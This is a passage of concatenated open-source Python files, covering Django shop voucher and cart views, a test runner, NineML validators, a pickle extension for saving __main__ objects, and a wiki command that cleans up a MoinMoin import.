        self._compute_lu()
        return self._U

    @property
    def R(self):
        """
        Row scaling factors, as a 1D array.
        """
        self._compute_lu()
        return self._R

    @property
    def perm_c(self):
        """
        Permutation Pc represented as an array of indices.

        The column permutation matrix can be reconstructed via:

        >>> Pc = np.zeros((n, n))
        >>> Pc[np.arange(n), perm_c] = 1
        """
        self._compute_lu()
        return self._Q

    @property
    def perm_r(self):
        """
        Permutation Pr represented as an array of indices.

        The row permutation matrix can be reconstructed via:

        >>> Pr = np.zeros((n, n))
        >>> Pr[perm_r, np.arange(n)] = 1
        """
        self._compute_lu()
        return self._P

    @property
    def nnz(self):
        """
        Combined number of nonzeros in L and U: L.nnz + U.nnz

        NOTE(review): unlike the other properties this does not call
        _compute_lu() first, so accessing it before L/U have been computed
        fails on the still-None factors -- confirm whether a
        _compute_lu() call is missing here.
        """
        return self._L.nnz + self._U.nnz
"""
A standalone test runner script, configuring the minimum settings
required for tests to execute.
Re-use at your own risk: many Django applications will require
different settings and/or templates to run their tests.
"""
import os
import sys
# Make sure the app is (at least temporarily) on the import path.
APP_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, APP_DIR)
# Minimum settings required for the app's tests.
SETTINGS_DICT = {
    'BASE_DIR': APP_DIR,
    # Contrib apps the registration app depends on, plus the app itself.
    'INSTALLED_APPS': (
        'django.contrib.auth',
        'django.contrib.contenttypes',
        'django.contrib.sessions',
        'django.contrib.sites',
        'registration',
    ),
    'ROOT_URLCONF': 'registration.backends.default.urls',
    # A throwaway SQLite database next to the app is enough for tests.
    'DATABASES': {
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
            'NAME': os.path.join(APP_DIR, 'db.sqlite3'),
        },
    },
    'MIDDLEWARE_CLASSES': (
        'django.middleware.common.CommonMiddleware',
        'django.middleware.csrf.CsrfViewMiddleware',
        'django.contrib.sessions.middleware.SessionMiddleware',
        'django.contrib.auth.middleware.AuthenticationMiddleware',
    ),
    # Required by django.contrib.sites.
    'SITE_ID': 1,
    # Test-only templates shipped alongside the test suite.
    'TEMPLATE_DIRS': (
        os.path.join(APP_DIR, 'tests/templates'),
    ),
}
def run_tests():
    """Configure Django, run the registration test suite, and exit.

    Exits with status 1 when any test fails and 0 otherwise.
    """
    # Making Django run this way is a two-step process. First, call
    # settings.configure() to give Django settings to work with:
    from django.conf import settings
    settings.configure(**SETTINGS_DICT)

    # Then, call django.setup() to initialize the application cache
    # and other bits:
    import django
    if hasattr(django, 'setup'):
        # django.setup() only exists on Django >= 1.7.
        django.setup()

    # Now we instantiate a test runner...
    from django.test.utils import get_runner
    TestRunner = get_runner(settings)

    # And then we run tests and return the results.
    test_runner = TestRunner(verbosity=1, interactive=True)
    failures = test_runner.run_tests(['registration.tests'])
    sys.exit(bool(failures))
| tdruez/django-registration | registration/runtests.py | Python | bsd-3-clause | 2,003 |
"""
This file contains the DynamicsValidator class for validating component
:copyright: Copyright 2010-2017 by the NineML Python team, see AUTHORS.
:license: BSD-3, see LICENSE for details.
"""
from builtins import object
from nineml.visitors.validators import NoDuplicatedObjectsValidator
from .general import (
TimeDerivativesAreDeclaredDynamicsValidator,
StateAssignmentsAreOnStateVariablesDynamicsValidator,
AliasesAreNotRecursiveDynamicsValidator,
NoUnresolvedSymbolsDynamicsValidator,
RegimeGraphDynamicsValidator,
RegimeOnlyHasOneHandlerPerEventDynamicsValidator,
CheckNoLHSAssignmentsToMathsNamespaceDynamicsValidator,
DimensionalityDynamicsValidator)
from .names import (
LocalNameConflictsDynamicsValidator,
DimensionNameConflictsDynamicsValidator,
DuplicateRegimeNamesDynamicsValidator,
RegimeAliasMatchesBaseScopeValidator)
from .ports import (
EventPortsDynamicsValidator, OutputAnalogPortsDynamicsValidator)
from .types import (
TypesDynamicsValidator)
class DynamicsValidator(object):
    """Class for grouping all the component-validations tests together"""

    @classmethod
    def validate_componentclass(cls, component_class,
                                validate_dimensions=True, **kwargs):
        """
        Tests a componentclassclass against a variety of tests, to verify its
        internal structure

        ``validate_dimensions`` toggles the dimensional-analysis pass at
        the end.  Each validator below is instantiated for its side
        effect; presumably construction performs the check and raises on
        invalid input -- see the individual validator classes.
        """
        # Check class structure:
        TypesDynamicsValidator(component_class, **kwargs)
        NoDuplicatedObjectsValidator(component_class, **kwargs)
        # Naming and uniqueness checks:
        DuplicateRegimeNamesDynamicsValidator(component_class, **kwargs)
        LocalNameConflictsDynamicsValidator(component_class, **kwargs)
        DimensionNameConflictsDynamicsValidator(component_class, **kwargs)
        RegimeAliasMatchesBaseScopeValidator(component_class, **kwargs)
        # Port checks:
        EventPortsDynamicsValidator(component_class, **kwargs)
        OutputAnalogPortsDynamicsValidator(component_class, **kwargs)
        # Equation and regime-graph checks:
        TimeDerivativesAreDeclaredDynamicsValidator(component_class, **kwargs)
        StateAssignmentsAreOnStateVariablesDynamicsValidator(component_class,
                                                             **kwargs)
        AliasesAreNotRecursiveDynamicsValidator(component_class, **kwargs)
        NoUnresolvedSymbolsDynamicsValidator(component_class, **kwargs)
        RegimeGraphDynamicsValidator(component_class, **kwargs)
        RegimeOnlyHasOneHandlerPerEventDynamicsValidator(component_class,
                                                         **kwargs)
        CheckNoLHSAssignmentsToMathsNamespaceDynamicsValidator(component_class,
                                                               **kwargs)
        # Optional, comparatively expensive, dimensionality pass:
        if validate_dimensions:
            DimensionalityDynamicsValidator(component_class, **kwargs)
| INCF/lib9ML | nineml/abstraction/dynamics/visitors/validators/base.py | Python | bsd-3-clause | 2,819 |
import json
# django imports
from django.contrib.auth.decorators import permission_required
from django.core.paginator import Paginator
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.http import require_POST
# lfs imports
import lfs.voucher.utils
from lfs.core.utils import LazyEncoder
from lfs.core.utils import render_to_ajax_response
from lfs.tax.models import Tax
from lfs.voucher.models import Voucher
from lfs.voucher.models import VoucherGroup
from lfs.voucher.models import VoucherOptions
from lfs.manage.voucher.forms import VoucherForm
from lfs.manage.voucher.forms import VoucherGroupAddForm
from lfs.manage.voucher.forms import VoucherGroupForm
from lfs.manage.voucher.forms import VoucherOptionsForm
# Views
@permission_required("core.manage_shop")
def no_vouchers(request, template_name="manage/voucher/no_vouchers.html"):
    """Displays that no vouchers exist.

    Falls through to the regular voucher management view as soon as at
    least one voucher group exists.
    """
    # exists() issues a cheap EXISTS query instead of loading every row
    # just to test for emptiness (the original used len(...) == 0).
    if not VoucherGroup.objects.exists():
        return render_to_response(template_name, RequestContext(request, {}))
    else:
        return manage_vouchers(request)
@permission_required("core.manage_shop")
def voucher_group(request, id, template_name="manage/voucher/voucher_group.html"):
    """Main view to display a voucher group.

    Renders the full management page (data, vouchers, options tabs plus
    the navigation column).  Redirects to the default voucher view when
    the group no longer exists.
    """
    try:
        voucher_group = VoucherGroup.objects.get(pk=id)
    except VoucherGroup.DoesNotExist:
        return manage_vouchers(request)

    return render_to_response(template_name, RequestContext(request, {
        "voucher_group": voucher_group,
        "data_tab": data_tab(request, voucher_group),
        "vouchers_tab": vouchers_tab(request, voucher_group),
        "options_tab": options_tab(request),
        "navigation": navigation(request, voucher_group),
    }))
# Parts
def navigation(request, voucher_group, template_name="manage/voucher/navigation.html"):
    """Renders the voucher-group navigation column as an HTML string."""
    context = RequestContext(request, {
        "voucher_group": voucher_group,
        "voucher_groups": VoucherGroup.objects.all(),
    })
    return render_to_string(template_name, context)
def data_tab(request, voucher_group, template_name="manage/voucher/data.html"):
    """Displays the data tab of the passed voucher group.

    NOTE: saving is done in save_voucher_group_data(); this view only
    renders the form.  After a valid POST it deliberately re-creates an
    unbound form so the tab shows the stored values, while an invalid
    POST keeps the bound form to display its errors.
    """
    if request.method == "POST":
        form = VoucherGroupForm(instance=voucher_group, data=request.POST)
        if form.is_valid():
            form = VoucherGroupForm(instance=voucher_group)
    else:
        form = VoucherGroupForm(instance=voucher_group)

    return render_to_string(template_name, RequestContext(request, {
        "voucher_group": voucher_group,
        "form": form,
    }))
def vouchers_tab(request, voucher_group, deleted=False, template_name="manage/voucher/vouchers.html"):
    """Displays the vouchers tab of the passed voucher group.

    Parameters:
        deleted: set by delete_vouchers() so a POST that deleted vouchers
            renders a fresh, unbound creation form instead of re-binding
            the deletion POST data.
    """
    vouchers = voucher_group.vouchers.all()
    paginator = Paginator(vouchers, 20)
    page = paginator.page((request.POST if request.method == 'POST' else request.GET).get("page", 1))

    taxes = Tax.objects.all()

    # Idiom fix: "not deleted" instead of comparing against False.
    if request.method == "POST" and not deleted:
        voucher_form = VoucherForm(data=request.POST)
    else:
        voucher_form = VoucherForm()

    return render_to_string(template_name, RequestContext(request, {
        "voucher_group": voucher_group,
        "taxes": taxes,
        "form": voucher_form,
        "vouchers_inline": vouchers_inline(request, voucher_group, vouchers, paginator, page),
    }))
def options_tab(request, template_name="manage/voucher/options.html"):
    """Displays the vouchers options

    Lazily creates the singleton VoucherOptions row when none exists yet
    and renders an unbound options form for it.
    """
    try:
        voucher_options = VoucherOptions.objects.all()[0]
    except IndexError:
        voucher_options = VoucherOptions.objects.create()

    form = VoucherOptionsForm(instance=voucher_options)
    return render_to_string(template_name, RequestContext(request, {
        "form": form,
    }))
def vouchers_inline(request, voucher_group, vouchers, paginator, page, template_name="manage/voucher/vouchers_inline.html"):
    """Renders one page of the voucher listing as an HTML string."""
    context = RequestContext(request, {
        "paginator": paginator,
        "page": page,
        "vouchers": vouchers,
        "voucher_group": voucher_group,
    })
    return render_to_string(template_name, context)
# Actions
@permission_required("core.manage_shop")
def set_vouchers_page(request):
    """Sets the displayed voucher page.

    AJAX view: re-renders the paginated voucher listing of the group
    given by the ``group`` parameter and returns it as JSON.
    """
    req = request.POST if request.method == 'POST' else request.GET
    group_id = req.get("group")
    voucher_group = VoucherGroup.objects.get(pk=group_id)
    vouchers = voucher_group.vouchers.all()

    paginator = Paginator(vouchers, 20)
    page = paginator.page(req.get("page", 1))

    html = (
        ("#vouchers-inline", vouchers_inline(request, voucher_group, vouchers, paginator, page)),
    )

    return HttpResponse(
        json.dumps({"html": html}, cls=LazyEncoder),
        content_type='application/json')
@permission_required("core.manage_shop")
def manage_vouchers(request):
    """Redirects to the first voucher group, or to the "no vouchers" view
    when no group exists yet.
    """
    try:
        first_group = VoucherGroup.objects.all()[0]
    except IndexError:
        return HttpResponseRedirect(reverse("lfs_no_vouchers"))
    return HttpResponseRedirect(
        reverse("lfs_manage_voucher_group", kwargs={"id": first_group.id}))
@permission_required("core.manage_shop")
def add_vouchers(request, group_id):
    """Creates a batch of vouchers for the group with ``group_id``.

    The amount and voucher properties come from the POST data.  Returns
    an AJAX response re-rendering the vouchers tab plus a status message.
    """
    voucher_group = VoucherGroup.objects.get(pk=group_id)
    form = VoucherForm(data=request.POST)
    msg = ""
    if form.is_valid():
        try:
            amount = int(request.POST.get("amount", 0))
        except (TypeError, ValueError):
            # ValueError added: a non-numeric "amount" string previously
            # escaped this handler and crashed the view.
            amount = 0

        for i in range(0, amount):
            # Draw random numbers until an unused one is found; bounded to
            # 100 attempts so a saturated number space cannot loop forever.
            number = lfs.voucher.utils.create_voucher_number()
            counter = 0
            while Voucher.objects.filter(number=number).exists() and counter < 100:
                number = lfs.voucher.utils.create_voucher_number()
                counter += 1

            # BUGFIX: test the number itself instead of the attempt counter.
            # The original "counter == 100" check reported failure even when
            # the 100th retry produced a unique number, and the success
            # message below then unconditionally overwrote the error message.
            if Voucher.objects.filter(number=number).exists():
                msg = _(u"Unable to create unique Vouchers for the options specified.")
                break

            Voucher.objects.create(
                number=number,
                group=voucher_group,
                creator=request.user,
                kind_of=request.POST.get("kind_of", 0),
                value=request.POST.get("value", 0.0),
                start_date=request.POST.get("start_date"),
                end_date=request.POST.get("end_date"),
                effective_from=request.POST.get("effective_from"),
                tax_id=request.POST.get("tax"),
                limit=request.POST.get("limit")
            )
        else:
            # Only report success when no creation failed (for/else runs
            # when the loop completed without break).
            msg = _(u"Vouchers have been created.")

    return render_to_ajax_response(
        (("#vouchers", vouchers_tab(request, voucher_group)), ),
        msg)
@permission_required("core.manage_shop")
@require_POST
def delete_vouchers(request, group_id):
    """Deletes checked vouchers.

    Voucher ids come from the ``voucher-ids`` POST list.  Vouchers are
    deleted one-by-one -- presumably to run any per-object delete()
    logic/signals that a bulk queryset delete would skip (confirm).
    """
    voucher_group = VoucherGroup.objects.get(pk=group_id)
    vouchers = Voucher.objects.filter(pk__in=request.POST.getlist("voucher-ids"))
    for voucher in vouchers:
        voucher.delete()

    return render_to_ajax_response(
        (("#vouchers", vouchers_tab(request, voucher_group, deleted=True)), ),
        _(u"Vouchers have been deleted."))
@permission_required("core.manage_shop")
def add_voucher_group(request, template_name="manage/voucher/add_voucher_group.html"):
    """Adds a voucher group

    On a valid POST the group is saved with the requesting user as
    creator and the browser is redirected to the new group's page; an
    invalid POST falls through and re-renders the bound form with errors.
    """
    if request.method == "POST":
        form = VoucherGroupAddForm(data=request.POST)
        if form.is_valid():
            voucher_group = form.save(commit=False)
            voucher_group.creator = request.user
            voucher_group.save()

            url = reverse("lfs_manage_voucher_group", kwargs={"id": voucher_group.id})
            return HttpResponseRedirect(url)
    else:
        form = VoucherGroupAddForm()

    return render_to_response(template_name, RequestContext(request, {
        "form": form,
        "voucher_groups": VoucherGroup.objects.all(),
        "came_from": (request.POST if request.method == 'POST' else request.GET).get("came_from",
            reverse("lfs_manage_vouchers")),
    }))
@permission_required("core.manage_shop")
def save_voucher_group_data(request, id):
    """Saves the data of the voucher group with passed id.

    NOTE(review): the success message is returned even when the form is
    invalid (nothing is saved in that case) -- confirm this is intended.
    """
    voucher_group = VoucherGroup.objects.get(pk=id)
    form = VoucherGroupForm(instance=voucher_group, data=request.POST)
    if form.is_valid():
        voucher_group = form.save()
    # Re-number all groups, then re-fetch so the response reflects the
    # updated position.
    _update_positions()
    voucher_group = VoucherGroup.objects.get(pk=voucher_group.id)
    return render_to_ajax_response(
        (("#data_tab", data_tab(request, voucher_group)),
         ("#navigation", navigation(request, voucher_group)),),
        _(u"Voucher data has been saved."))
@permission_required("core.manage_shop")
@require_POST
def delete_voucher_group(request, id):
    """Deletes voucher group with given id and all assigned vouchers.

    Redirects to the voucher overview either way; a success message
    cookie is only set when the group actually existed.
    """
    try:
        voucher_group = VoucherGroup.objects.get(pk=id)
    except VoucherGroup.DoesNotExist:
        return HttpResponseRedirect(reverse("lfs_manage_vouchers"))
    else:
        voucher_group.delete()

    return lfs.core.utils.set_message_cookie(
        url=reverse("lfs_manage_vouchers"),
        msg=_(u"Voucher group and assigned vouchers have been deleted."),
    )
@permission_required("core.manage_shop")
def save_voucher_options(request):
    """Saves voucher options.

    Lazily creates the singleton VoucherOptions row when missing.
    NOTE(review): the success message is returned even when the form is
    invalid (nothing is saved in that case) -- confirm this is intended.
    """
    try:
        voucher_options = VoucherOptions.objects.all()[0]
    except IndexError:
        voucher_options = VoucherOptions.objects.create()
    form = VoucherOptionsForm(instance=voucher_options, data=request.POST)
    if form.is_valid():
        form.save()
    return render_to_ajax_response(
        (("#options_tab", options_tab(request)),),
        _(u"Voucher options has been saved.")
    )
def _update_positions():
    """Re-numbers all voucher groups in steps of ten (10, 20, 30, ...)."""
    for position, group in enumerate(VoucherGroup.objects.all(), start=1):
        group.position = position * 10
        group.save()
| baffolobill/django-lfs | lfs/manage/voucher/views.py | Python | bsd-3-clause | 10,411 |
from django import forms
from django.contrib import messages
from django.core.exceptions import ValidationError
from django.db.models import ObjectDoesNotExist
from django.shortcuts import get_object_or_404, redirect, render_to_response
from django.template import RequestContext
from django.utils.translation import ugettext as _
from django.views import generic
from plata.contact.models import Contact
from plata.discount.models import Discount
from plata.shop.views import Shop
from plata.shop.models import Order
from simple.models import Product
shop = Shop(Contact, Order, Discount)
product_list = generic.ListView.as_view(
queryset=Product.objects.filter(is_active=True),
template_name='product/product_list.html',
)
class OrderItemForm(forms.Form):
    """Form asking how many units of a product to put into the cart."""
    # Quantity is constrained to 1..100 by form validation.
    quantity = forms.IntegerField(label=_('quantity'), initial=1,
        min_value=1, max_value=100)
def product_detail(request, object_id):
    """Display a product page and handle its "add to cart" form.

    On a valid POST the product is added to (or updated in) the current
    order and the user is redirected to the cart; otherwise the product
    page is rendered with the (possibly bound) quantity form.
    Inactive products 404.
    """
    product = get_object_or_404(Product.objects.filter(is_active=True), pk=object_id)

    if request.method == 'POST':
        form = OrderItemForm(request.POST)

        if form.is_valid():
            order = shop.order_from_request(request, create=True)

            try:
                order.modify_item(product, form.cleaned_data.get('quantity'))
                messages.success(request, _('The cart has been updated.'))
            except ValidationError as e:  # 'as' syntax works on Python 2.6+ and 3.x
                if e.code == 'order_sealed':
                    # Plain loop instead of a side-effect list comprehension,
                    # which built and discarded a throwaway list.
                    for msg in e.messages:
                        messages.error(request, msg)
                else:
                    raise

            return redirect('plata_shop_cart')
    else:
        form = OrderItemForm()

    return render_to_response('product/product_detail.html', {
        'object': product,
        'form': form,
    }, context_instance=RequestContext(request))
| ixc/plata | examples/simple/views.py | Python | bsd-3-clause | 1,810 |
"""
Extensions to pickle allowing items in __main__ to be saved.
"""
# CEBALERT: move into snapshots.py?
import new
import pickle
import types
import __main__
from StringIO import StringIO
import copy
def _name_is_main(obj):
# CEBALERT: see IPython hack in commandline.py
return obj.__module__ == "__main__" or obj.__module__ == "__mynamespace__"
class PickleMain(object):
    """
    Pickle support for types and functions defined in __main__.

    When pickled, saves types and functions defined in __main__ by
    value (i.e. as bytecode). When unpickled, loads previously saved
    types and functions back into __main__.

    NOTE(review): Python 2 only -- relies on the removed ``new`` module,
    ``StringIO``, and print statements.
    """
    def _create_pickler(self):
        # Usually we use the cPickle module rather than the pickle
        # module (because cPickle is faster), but here we need control
        # over the pickling process so we use pickle.
        #
        # Additionally, we create a Pickler instance to avoid changing
        # defaults in the pickle module itself, so that there are no side
        # effects for code elsewhere (although we don't use pickle
        # anywhere else ourselves...).
        self.pickled_bytecode = StringIO()
        # Protocol -1 means "highest protocol available".
        self.pickler = pickle.Pickler(self.pickled_bytecode,-1)

        # CB: pickle.Pickler's dispatch attribute is a class
        # attribute (I don't know why, but it is...), so before
        # modifying this instance's dispatch attribute we make sure
        # modifications will affect only this instance.
        self.pickler.dispatch = copy.copy(self.pickler.dispatch)

        # Route each interesting type through the module-level save_*
        # functions defined below.
        self.pickler.dispatch[new.code] = save_code
        self.pickler.dispatch[new.function] = save_function
        self.pickler.dispatch[dict] = save_module_dict
        self.pickler.dispatch[new.classobj] = save_classobj
        self.pickler.dispatch[new.instancemethod] = save_instancemethod
        self.pickler.dispatch[new.module] = save_module
        self.pickler.dispatch[type] = save_type
        # CB: maybe this should be registered from elsewhere
        import param
        self.pickler.dispatch[param.parameterized.ParameterizedMetaclass] = save_type

    def __getstate__(self):
        """Collect public functions and classes from __main__, pickle their
        bytecode, and return it as this object's state."""
        self._create_pickler()
        bytecode = {}
        for name,obj in __main__.__dict__.items():
            if not name.startswith('_'):
                if isinstance(obj,types.FunctionType) or isinstance(obj,type):
                    # (could be extended to other types, I guess
                    if _name_is_main(obj):
                        #CB: how do I print out info via Parameterized?
                        print "%s is defined in __main__: saving bytecode."%name
                        bytecode[name] = obj
        self.pickler.dump(bytecode)
        return {'pickled_bytecode':self.pickled_bytecode}

    def __setstate__(self,state):
        """Unpickle the saved bytecode and install each object back into
        __main__'s namespace."""
        bytecode = pickle.load(StringIO(state['pickled_bytecode'].getvalue()))
        for name,obj in bytecode.items():
            print "%s restored from bytecode into __main__"%name
            __main__.__dict__[name] = obj
### Copied from http://code.activestate.com/recipes/572213/ ###
# Original docstring
#
# Extend pickle module to allow pickling of interpreter state
# including any interactively defined functions and classes.
#
# This module is not required for unpickling such pickle files.
#
# >>> import savestate, pickle, __main__
# >>> pickle.dump(__main__, open('savestate.pickle', 'wb'), 2)
# (note that we're not actually using it to pickle __main__, and I've
# removed the lines that change pickle's defaults)
def save_code(self, obj):
    """ Save a code object by value """
    # Reduce to new.code(...) with the full Python 2 code-object field
    # tuple (no kwonlyargcount -- this layout is Python 2 specific).
    args = (
        obj.co_argcount, obj.co_nlocals, obj.co_stacksize, obj.co_flags, obj.co_code,
        obj.co_consts, obj.co_names, obj.co_varnames, obj.co_filename, obj.co_name,
        obj.co_firstlineno, obj.co_lnotab, obj.co_freevars, obj.co_cellvars
    )
    self.save_reduce(new.code, args, obj=obj)
def save_function(self, obj):
    """ Save functions by value if they are defined interactively """
    # Lambdas have no importable name, so they are always saved by value too.
    if _name_is_main(obj) or obj.func_name == '<lambda>':
        args = (obj.func_code, obj.func_globals, obj.func_name, obj.func_defaults, obj.func_closure)
        self.save_reduce(new.function, args, obj=obj)
    else:
        # Ordinary module-level function: save by reference as usual.
        self.save_global(obj)
        #pickle.Pickler.save_global(self, obj)
def save_global_byname(self, obj, modname, objname):
    """ Save obj as a global reference. Used for objects that pickle does not find correctly. """
    # Emit a raw GLOBAL opcode ("c<module>\n<name>\n") directly to the stream.
    self.write('%s%s\n%s\n' % (pickle.GLOBAL, modname, objname))
    self.memoize(obj)
def save_module_dict(self, obj, main_dict=vars(__import__('__main__'))):
    """ Special-case __main__.__dict__. Useful for a function's func_globals member. """
    # `main_dict` is captured once at import time; the identity test is
    # deliberate -- only the real __main__ namespace gets the special form.
    if obj is main_dict:
        save_global_byname(self, obj, '__main__', '__dict__')
    else:
        # Any other dict pickles normally.
        return self.save_dict(obj)
        #return pickle.Pickler.save_dict(self, obj) # fallback to original
def save_classobj(self, obj):
    """ Save an interactively defined classic class object by value """
    if _name_is_main(obj):
        # Rebuild via new.classobj(name, bases, dict) on unpickling.
        args = (obj.__name__, obj.__bases__, obj.__dict__)
        self.save_reduce(new.classobj, args, obj=obj)
    else:
        name = str(obj).split('.')[-1] # CEB: hack to find classic class name
        self.save_global(obj,name)
        #pickle.Pickler.save_global(self, obj, name)
def save_instancemethod(self, obj):
    """Pickle a bound/unbound method by reducing it to new.instancemethod."""
    # Instance methods are re-created on every attribute access, so there
    # is no point memoizing them.
    self.save_reduce(new.instancemethod,
                     (obj.im_func, obj.im_self, obj.im_class))
def save_module(self, obj):
    """ Save modules by reference, except __main__ which also gets its contents saved by value """
    if _name_is_main(obj):
        # Re-import on load, then restore the entire namespace as state.
        self.save_reduce(__import__, (obj.__name__,), obj=obj, state=vars(obj).copy())
    elif obj.__name__.count('.') == 0:
        # Top-level module: a plain re-import is enough.
        self.save_reduce(__import__, (obj.__name__,), obj=obj)
    else:
        # Submodule: __import__('a.b') returns 'a', so save by global
        # reference (module 'a', attribute 'b') instead.
        save_global_byname(self, obj, *obj.__name__.rsplit('.', 1))
def save_type(self, obj):
    """Save type objects: by value for types defined in __main__, by
    reference otherwise."""
    if getattr(new, obj.__name__, None) is obj:
        # Types in 'new' module claim their module is '__builtin__' but are not actually there
        save_global_byname(self, obj, 'new', obj.__name__)
    elif _name_is_main(obj):
        # Types in __main__ are saved by value
        # Make sure we have a reference to type.__new__
        if id(type.__new__) not in self.memo:
            self.save_reduce(getattr, (type, '__new__'), obj=type.__new__)
            # Immediately discard the value from the stack; only the memo
            # entry is needed.
            self.write(pickle.POP)
        # Copy dictproxy to real dict
        d = dict(obj.__dict__)
        # Clean up unpickleable descriptors added by Python
        d.pop('__dict__', None)
        d.pop('__weakref__', None)
        args = (type(obj), obj.__name__, obj.__bases__, d)
        self.save_reduce(type.__new__, args, obj=obj)
    else:
        # Fallback to default behavior: save by reference
        self.save_global(obj)
        #pickle.Pickler.save_global(self, obj)
###############################################################
| Tasignotas/topographica_mirror | topo/misc/picklemain.py | Python | bsd-3-clause | 7,106 |
import re
from waliki.signals import page_saved
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from waliki.models import Page
from django.utils.translation import ugettext_lazy as _
from django.utils.text import get_text_list
try:
from waliki.attachments.models import Attachment
except ImportError:
Attachment = None
try:
from sh import pandoc, echo
pandoc = pandoc.bake(_tty_out=False)
echo = echo.bake(_tty_out=False)
except ImportError:
pandoc = None
def clean_meta(rst_content):
    """Remove MoinMoin metadata (the leading '#' lines) from the top of the file.

    Returns the content from the first non-metadata line onwards. If every
    line is metadata, an empty string is returned (the original loop kept
    the final '#' line in that case -- off-by-one fixed here).
    """
    lines = rst_content.split('\n')
    i = 0
    while i < len(lines) and lines[i].startswith('#'):
        i += 1
    return '\n'.join(lines[i:])
def delete_relative_links(rst_content):
    """Drop relative reST link targets (".. name: ../path").

    Waliki resolves page links implicitly, so these explicit relative
    targets are not needed.
    """
    relative_target = r'^(\.\. .*: \.\./.*)\n$'
    return re.sub(relative_target, '', rst_content, flags=re.MULTILINE)
def attachments(rst_content, slug):
    """Rewrite ``attachment:filename`` references as links to the uploaded
    Attachment belonging to the page *slug*.

    Unresolvable attachments are reported and left untouched in the text.
    """
    def rep(matchobj):
        for filename in matchobj.groups(1):
            try:
                a = Attachment.objects.filter(file__endswith=filename, page__slug=slug)[0]
            except IndexError:
                print('Cant find %s in %s' % (filename, slug))
                # Bug fix: re.sub requires the replacement callable to
                # return a string -- returning None raised TypeError.
                # Keep the original reference text instead.
                return matchobj.group(0)
            return '`%s <%s>`_' % (filename, a.get_absolute_url())
    return re.sub(r'`attachment:(.*)`_', rep, rst_content, flags=re.MULTILINE)
def directives(rst_content):
    """Append a ``.. role::`` definition for every custom inline role
    (``:name:`...```) used in the content, so docutils can render them."""
    for role in re.findall(r':(\w+):`.*`', rst_content, flags=re.MULTILINE):
        rst_content += """
.. role:: {directive}
   :class: {directive}
""".format(directive=role)
    return rst_content
def emojis(rst_content):
    """Convert MoinMoin smiley substitutions (e.g. ``|:)|``) into the emoji
    substitution names used by Waliki (e.g. ``|smile|``).

    Unknown smileys are dropped from the output entirely.
    """
    emojis_map = {
        ':)': 'smile',
        ':-)': 'smile',
        ';)': 'wink',
        ';-)': 'wink',
        ':-?': 'smirk',
        ':?': 'smirk',
        ':(': 'confused',
        ':-(': 'confused',
        ':D': 'laughing',
        ':-D': 'laughing',
        ':-P': 'stuck_out_tongue_closed_eyes',
        ':P': 'stuck_out_tongue_closed_eyes',
        ":'(": 'cry',
        ":'-(": 'cry',
    }

    def substitute(match):
        name = emojis_map.get(match.group(1))
        if name is None:
            return ''
        return '|%s|' % name

    return re.sub(r'\|((?:\:|;).{1,3})\|', substitute, rst_content, flags=re.MULTILINE)
def email(rst_content):
    """Turn MoinMoin ``MailTo(...)`` pseudo-links into inline literals."""
    mailto = r'`\[\[MailTo\((.*)\)\]\]`_(?:\.\.)?'
    return re.sub(mailto, r'``\1``', rst_content)
def title_level(rst_content):
    """Demote '~' section underlines to '-' underlines of the same width."""
    return re.sub(r'^~+$',
                  lambda m: '-' * len(m.group(0)),
                  rst_content, flags=re.MULTILINE)
def code(rst_content):
    """Convert raw-html line-span code blocks into reST via pandoc.

    No-op when the sh/pandoc toolchain is unavailable (``pandoc`` is None
    in that case -- see the import guard at the top of the module).
    """
    if not pandoc:
        return rst_content
    # Matches a '::' literal block whose body is a '.. raw:: html'
    # directive wrapping <span class="line"> markup.
    pattern = r'^\:\:\n\s+\.\. raw:: html\n\s+(<span class\=\"line\"\>.*?|\s+?<\/span\>)\n\s*$'

    def convert(match):
        source = match.groups()[0]
        source = '\n'.join(l.strip() for l in source.split('\n'))
        source = "<pre>%s</pre>" % source
        # Round-trip through pandoc: html -> reST.
        rst_source = pandoc(echo(source), f='html', t='rst').stdout.decode('utf8')
        # rst_source = rst_source.strip().replace('\n', '\n    ') + '\n'
        return rst_source
    result = re.sub(pattern, convert, rst_content, flags=re.DOTALL | re.MULTILINE)
    return result
class Command(BaseCommand):
    """Management command that applies cleanup filters to pages imported
    from MoinMoin via moin2git, saving only pages whose content changed."""

    help = 'Cleanup filters for a moin2git import'

    # NOTE(review): optparse-style option_list (deprecated in newer Django
    # in favour of add_arguments()).
    option_list = (
        make_option('--limit-to',
                    dest='slug',
                    default='',
                    help="optional namespace"),
        make_option('--filters',
                    dest='filters',
                    default='all',
                    help="comma separated list of filter functions to apply"),
        make_option('--message',
                    dest='message',
                    default=_("RestructuredText clean up"),
                    help="log message"),
    ) + BaseCommand.option_list

    def handle(self, *args, **options):
        """Validate the requested filters, run them over the selected pages,
        and save/signal each page whose raw content or title changed."""
        valid_filters = ['meta', 'links',
                         'attachments', 'directives',
                         'emojis', 'title', 'email', 'code', 'title_level']
        slug = options['slug']
        filters = options['filters']
        if filters == 'all':
            filters = valid_filters
        else:
            filters = [f.strip() for f in filters.split(',')]
        # Reject any filter name not in the known set.
        if not set(filters).issubset(valid_filters):
            valid = get_text_list(valid_filters, 'and')
            raise CommandError("At least one filter is unknown. Valid filters are:\n %s" % valid)

        # --limit-to restricts the run to a slug prefix (namespace).
        if slug:
            pages = Page.objects.filter(slug__startswith=slug)
        else:
            pages = Page.objects.all()

        for page in pages:
            title = None
            print('\nApplying filter/s %s to %s' % (get_text_list(filters, 'and'), page.slug))
            raw = page.raw
            # Each filter transforms the raw text in sequence.
            if 'meta' in filters:
                raw = clean_meta(raw)
            if 'links' in filters:
                raw = delete_relative_links(raw)
            if 'attachments' in filters:
                raw = attachments(raw, page.slug)
            if 'directives' in filters:
                raw = directives(raw)
            if 'emojis' in filters:
                raw = emojis(raw)
            if 'email' in filters:
                raw = email(raw)
            if 'title_level' in filters:
                raw = title_level(raw)
            if 'code' in filters:
                # The 'code' filter shells out to pandoc; skip when absent.
                if not pandoc:
                    print('The filter "code" need Pandoc installed in your system. Ignoring')
                else:
                    raw = code(raw)
            if 'title' in filters and not page.title:
                title = page._get_part('get_document_title')

            # Persist only when something actually changed.
            if raw != page.raw or title:
                if title:
                    page.title = title
                if raw != page.raw:
                    page.raw = raw
                page.save()
